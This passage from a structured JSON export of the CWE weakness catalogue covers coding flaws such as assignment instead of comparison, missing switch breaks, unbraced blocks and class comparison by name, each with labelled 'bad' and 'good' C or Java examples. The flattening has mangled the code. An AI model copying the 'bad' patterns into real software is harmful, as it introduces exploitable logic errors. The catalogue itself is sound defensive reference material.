operator \\"=\\" rather than the comparison operator \\"==\\". The result of using the assignment operator instead of the comparison operator causes the int variable to be reassigned locally and the expression in the if statement will always evaluate to the value on the right hand side of the expression. This will result in the input value not being properly validated, which can cause unexpected results."},{"Intro_Text":"In this example, we show how assigning instead of comparing can impact code when values are being passed by reference instead of by value. Consider a scenario in which a string is being processed from user input. Assume the string has already been formatted such that different user inputs are concatenated with the colon character. When the processString function is called, the test for the colon character will result in an insertion of the colon character instead, adding new input separators. Since the string was passed by reference, the data sentinels will be inserted in the original string (CWE-464), and further processing of the inputs will be altered, possibly malformed..","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"void processString (char *str) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"int i;for(i=0; i<strlen(str); i++) {}","xhtml:br":["",""],"xhtml:div":{"#text":"if (isalnum(str[i])){}else if (str[i] = \':\') {}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":[{"#text":"processChar(str[i]);","attr":{"@_style":"margin-left:10px;"}},{"#text":"movingToNewInput();}","attr":{"@_style":"margin-left:10px;"}}],"xhtml:br":""}}}}}},{"Intro_Text":"The following Java example attempts to perform some processing based on the boolean value of the input parameter. However, the expression to be evaluated in the if statement uses the assignment operator \\"=\\" rather than the comparison operator \\"==\\". As with the previous examples, the variable will be reassigned locally and the expression in the if statement will evaluate to true and unintended processing may occur.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public void checkValid(boolean isValid) {}","xhtml:div":{"#text":"if (isValid = true) {}else {}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":[{"#text":"System.out.println(\\"Performing processing\\");doSomethingImportant();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"System.out.println(\\"Not Valid, do not perform processing\\");return;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}],"xhtml:br":""}}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"public void checkValid(boolean isValid) {}","xhtml:div":{"#text":"if (isValid) {}else {}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":[{"#text":"System.out.println(\\"Performing processing\\");doSomethingImportant();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"System.out.println(\\"Not Valid, do not perform processing\\");return;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}],"xhtml:br":""}}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"public void checkValid(boolean isValid) {}","xhtml:div":{"#text":"if (!isValid) {}System.out.println(\\"Performing processing\\");doSomethingImportant();","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"System.out.println(\\"Not Valid, do not perform processing\\");return;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},"xhtml:br":["",""]}}}],"Body_Text":["While most Java compilers will catch the use of an assignment operator when a comparison operator is required, for boolean variables in Java the use of the assignment operator within an expression is allowed. If possible, try to avoid using comparison operators on boolean variables in java. Instead, let the values of the variables stand for themselves, as in the following code.","Alternatively, to test for false, just use the boolean NOT operator."]},{"Intro_Text":"The following example demonstrates the weakness.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"void called(int foo){}int main() {}","xhtml:div":[{"#text":"if (foo=1) printf(\\"foo\\\\n\\");","attr":{"@_style":"margin-left:10px;"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"called(2);return 0;","xhtml:br":["",""]}}],"xhtml:br":""}}}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Assigning instead of comparing"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP1","Entry_Name":"Glitch in computation"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"EXP45-C","Entry_Name":"Do not perform assignments in selection statements","Mapping_Fit":"CWE More Abstract"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-18"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 6, "Typos", Page 289"}}]},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Description, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations"}]}},"482":{"attr":{"@_ID":"482","@_Name":"Comparing instead of Assigning","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The code uses an operator for comparison when the intention was to perform an assignment.","Extended_Description":"In many languages, the compare statement is very close in appearance to the assignment statement; they are often confused.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"480","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"This bug primarily originates from a typo."}},"Likelihood_Of_Exploit":"Low","Common_Consequences":{"Consequence":{"Scope":["Availability","Integrity"],"Impact":"Unexpected State","Note":"The assignment will not take place, which should cause obvious program execution problems."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Testing","Description":"Many IDEs and static analysis products will detect this problem."}},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The following example demonstrates the weakness.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"void called(int foo) {}int main() {}","xhtml:div":[{"#text":"foo==1;if (foo==1) System.out.println(\\"foo\\\\n\\");","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"called(2);return 0;","xhtml:br":["",""]}}],"xhtml:br":""}}},{"attr":{"@_Demonstrative_Example_ID":"DX-103"},"Intro_Text":"The following C/C++ example shows a simple implementation of a stack that includes methods for adding and removing integer values from the stack. The example uses pointers to add and remove integer values to the stack array variable.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"#define SIZE 50int *tos, *p1, stack[SIZE];void push(int i) {}int pop(void) {}int main(int argc, char *argv[]) {}","xhtml:br":["","","","","","",""],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"p1++;if(p1==(tos+SIZE)) {}*p1 == i;","xhtml:br":["",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"xhtml:br":["",""],"xhtml:i":"// Print stack overflow error message and exit"}}}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if(p1==tos) {}p1--;return *(p1+1);","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"xhtml:br":["",""],"xhtml:i":"// Print stack underflow error message and exit"}},"xhtml:br":["",""]}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"tos = stack;p1 = stack;...return 0;","xhtml:br":["","","","","",""],"xhtml:i":["// initialize tos and p1 to point to the top of stack","// code to add and remove items from stack"]}}]}},"Body_Text":["The push method includes an expression to assign the integer value to the location in the stack pointed to by the pointer variable.","However, this expression uses the comparison operator \\"==\\" rather than the assignment operator \\"=\\". The result of using the comparison operator instead of the assignment operator causes erroneous values to be entered into the stack and can cause unexpected results."]}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Comparing instead of assigning"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP2","Entry_Name":"Unused Entities"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-18"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 6, "Typos", Page 289"}}]},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Description, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Common_Consequences, Modes_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"}]}},"483":{"attr":{"@_ID":"483","@_Name":"Incorrect Block Delimitation","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The code does not explicitly delimit a block that is intended to contain 2 or more statements, creating a logic error.","Extended_Description":"In some languages, braces (or other delimiters) are optional for blocks. When the delimiter is omitted, it is possible to insert a logic error in which a statement is thought to be in a block but is not. In some cases, the logic error can have security implications.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"670","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":[{"Ordinality":"Primary"},{"Ordinality":"Indirect"}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Sometimes"}},{"attr":{"@_Name":"C++","@_Prevalence":"Sometimes"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"Low","Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Alter Execution Logic","Note":"This is a general logic error which will often lead to obviously-incorrect behaviors that are quickly noticed and fixed. In lightly tested or untested code, this error may be introduced it into a production environment and provide additional attack vectors by creating a control flow path leading to an unexpected state in the application. The consequences will depend on the types of behaviors that are being incorrectly executed."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Always use explicit block delimitation and use static-analysis technologies to enforce this practice."}},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"In this example, the programmer has indented the statements to call Do_X() and Do_Y(), as if the intention is that these functions are only called when the condition is true. However, because there are no braces to signify the block, Do_Y() will always be executed, even if the condition is false.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"if (condition==true)","xhtml:div":{"#text":"Do_X();Do_Y();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}},"Body_Text":"This might not be what the programmer intended. When the condition is critical for security, such as in making a security decision or detecting a critical error, this may produce a vulnerability."},{"Intro_Text":"In this example, the programmer has indented the Do_Y() statement as if the intention is that the function should be associated with the preceding conditional and should only be called when the condition is true. However, because Do_X() was called on the same line as the conditional and there are no braces to signify the block, Do_Y() will always be executed, even if the condition is false.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"if (condition==true) Do_X();","xhtml:div":{"#text":"Do_Y();","attr":{"@_style":"margin-left:10px;"}}}},"Body_Text":"This might not be what the programmer intended. When the condition is critical for security, such as in making a security decision or detecting a critical error, this may produce a vulnerability."}]},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2014-1266","Description":"incorrect indentation of \\"goto\\" statement makes it more difficult to detect an incorrect goto (Apple\'s \\"goto fail\\")","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1266"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Incorrect block delimitation"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-18"}}},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Description, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Demonstrative_Examples, Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships, Type"}],"Contribution":{"attr":{"@_Type":"Feedback"},"Contribution_Name":"Michael Koo and Paul Black","Contribution_Organization":"NIST","Contribution_Date":"2010-04-28","Contribution_Comment":"Correction to Demonstrative Examples"}}},"484":{"attr":{"@_ID":"484","@_Name":"Omitted Break Statement in Switch","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The program omits a break statement within a switch or similar construct, causing code associated with multiple conditions to execute. This can cause problems when the programmer only intended to execute code associated with one condition.","Extended_Description":"This can lead to critical code executing in situations where it should not.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"710","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"670","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":[{"Ordinality":"Primary"},{"Ordinality":"Indirect"}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C#","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"PHP","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Alter Execution Logic","Note":"This weakness can cause unintended logic to be executed and other unexpected application behavior."}},"Detection_Methods":{"Detection_Method":[{"Method":"White Box","Description":"Omission of a break statement might be intentional, in order to support fallthrough. Automated detection methods might therefore be erroneous. Semantic understanding of expected program behavior is required to interpret whether the code is correct."},{"Method":"Black Box","Description":"Since this weakness is associated with a code construct, it would be indistinguishable from other errors that produce the same behavior."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Omitting a break statement so that one may fall through is often indistinguishable from an error, and therefore should be avoided. If you need to use fall-through capabilities, make sure that you have clearly documented this within the switch statement, and ensure that you have examined all the logical possibilities."},{"Phase":"Implementation","Description":"The functionality of omitting a break statement could be clarified with an if statement. This method is much safer."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"In both of these examples, a message is printed based on the month passed into the function:","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public void printMessage(int month){}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"switch (month) {}println(\\" is a great month\\");","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"case 1: print(\\"January\\");case 2: print(\\"February\\");case 3: print(\\"March\\");case 4: print(\\"April\\");case 5: print(\\"May\\");case 6: print(\\"June\\");case 7: print(\\"July\\");case 8: print(\\"August\\");case 9: print(\\"September\\");case 10: print(\\"October\\");case 11: print(\\"November\\");case 12: print(\\"December\\");","xhtml:br":["","","","","","","","","","","",""]}},"xhtml:br":""}}}},{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"void printMessage(int month){}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"switch (month) {}printf(\\" is a great month\\");","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"case 1: printf(\\"January\\");case 2: printf(\\"February\\");case 3: printf(\\"March\\");case 4: printf(\\"April\\");case 5: printff(\\"May\\");case 6: printf(\\"June\\");case 7: printf(\\"July\\");case 8: printf(\\"August\\");case 9: printf(\\"September\\");case 10: printf(\\"October\\");case 11: printf(\\"November\\");case 12: printf(\\"December\\");","xhtml:br":["","","","","","","","","","","",""]}},"xhtml:br":""}}}}],"Body_Text":"Both examples do not use a break statement after each case, which leads to unintended fall-through behavior. For example, calling \\"printMessage(10)\\" will result in the text \\"OctoberNovemberDecember is a great month\\" being printed."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Omitted break statement"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP4","Entry_Name":"Unchecked Status Condition"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-18"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 7, "Switch Statements", Page 337"}}]},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Description, Detection_Factors, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Description, Detection_Factors, Name, Other_Notes, Potential_Mitigations, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Omitted Break Statement","attr":{"@_Date":"2008-11-24"}}}},"486":{"attr":{"@_ID":"486","@_Name":"Comparison of Classes by Name","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The program compares classes by name, which can cause it to use the wrong class when multiple classes can have the same name.","Extended_Description":"If the decision to trust the methods and data of an object is based on the name of a class, it is possible for malicious users to send objects of the same name as trusted classes and thereby gain the trust afforded to known classes and types.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1025","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":["Integrity","Confidentiality","Availability"],"Impact":"Execute Unauthorized Code or Commands","Note":"If a program relies solely on the name of an object to determine identity, it may execute the incorrect or unintended code."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Use class equivalency to determine type. Rather than use the class name to determine if an object is of a given type, use the getClass() method, and == operator."}},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"In this example, the expression in the if statement compares the class of the inputClass object to a trusted class by comparing the class names.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"if (inputClass.getClass().getName().equals(\\"TrustedClassName\\")) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"xhtml:br":["","","",""],"xhtml:i":["// Do something assuming you trust inputClass","// ..."]}}}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"if (inputClass.getClass() == TrustedClass.class) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"xhtml:br":["","","",""],"xhtml:i":["// Do something assuming you trust inputClass","// ..."]}}}}],"Body_Text":"However, multiple classes can have the same name therefore comparing an object\'s class by name can allow untrusted classes of the same name as the trusted class to be use to execute unintended or incorrect code. To compare the class of an object to the intended class the getClass() method and the comparison operator \\"==\\" should be used to ensure the correct trusted class is used, as shown in the following example."},{"Intro_Text":"In this example, the Java class, TrustedClass, overrides the equals method of the parent class Object to determine equivalence of objects of the class. The overridden equals method first determines if the object, obj, is the same class as the TrustedClass object and then compares the object\'s fields to determine if the objects are equivalent.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public class TrustedClass {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...@Overridepublic boolean equals(Object obj) {}...","xhtml:br":["","","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"boolean isEquals = false;if (obj.getClass().getName().equals(this.getClass().getName())) {}return isEquals;","xhtml:br":["","","","",""],"xhtml:i":"// first check to see if the object is of the same class","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...if (...) {}","xhtml:br":["","",""],"xhtml:i":"// then compare object fields","xhtml:div":{"#text":"isEquals = true;","attr":{"@_style":"margin-left:10px;"}}}}}}}}}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"public boolean equals(Object obj) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...if (obj.getClass() == this.getClass()) {}...","xhtml:br":["","","","",""],"xhtml:i":"// first check to see if the object is of the same class","xhtml:div":{"#text":"...","attr":{"@_style":"margin-left:10px;"}}}}}}],"Body_Text":"However, the equals method compares the class names of the object, obj, and the TrustedClass object to determine if they are the same class. As with the previous example using the name of the class to compare the class of objects can lead to the execution of unintended or incorrect code if the object passed to the equals method is of another class with the same name. To compare the class of an object to the intended class, the getClass() method and the comparison operator \\"==\\" should be used to ensure the correct trusted class is used, as shown in the following example."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Comparing Classes by Name"},{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Comparing classes by name"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"OBJ09-J","Entry_Name":"Compare classes and not class names"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP1","Entry_Name":"Glitch in computation"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-6"}},{"attr":{"@_External_Reference_ID":"REF-18"}}]},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Description, Relationships, Other_Notes, Relevant_Properties, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships, Relevant_Properties"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"}],"Previous_Entry_Name":{"#text":"Comparing Classes by Name","attr":{"@_Date":"2008-04-11"}}}},"487":{"attr":{"@_ID":"487","@_Name":"Reliance on Package-level Scope","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"Java packages are not inherently closed; therefore, relying on them for code security is not a good practice.","Extended_Description":"The purpose of package scope is to prevent accidental access by other parts of a program. This is an 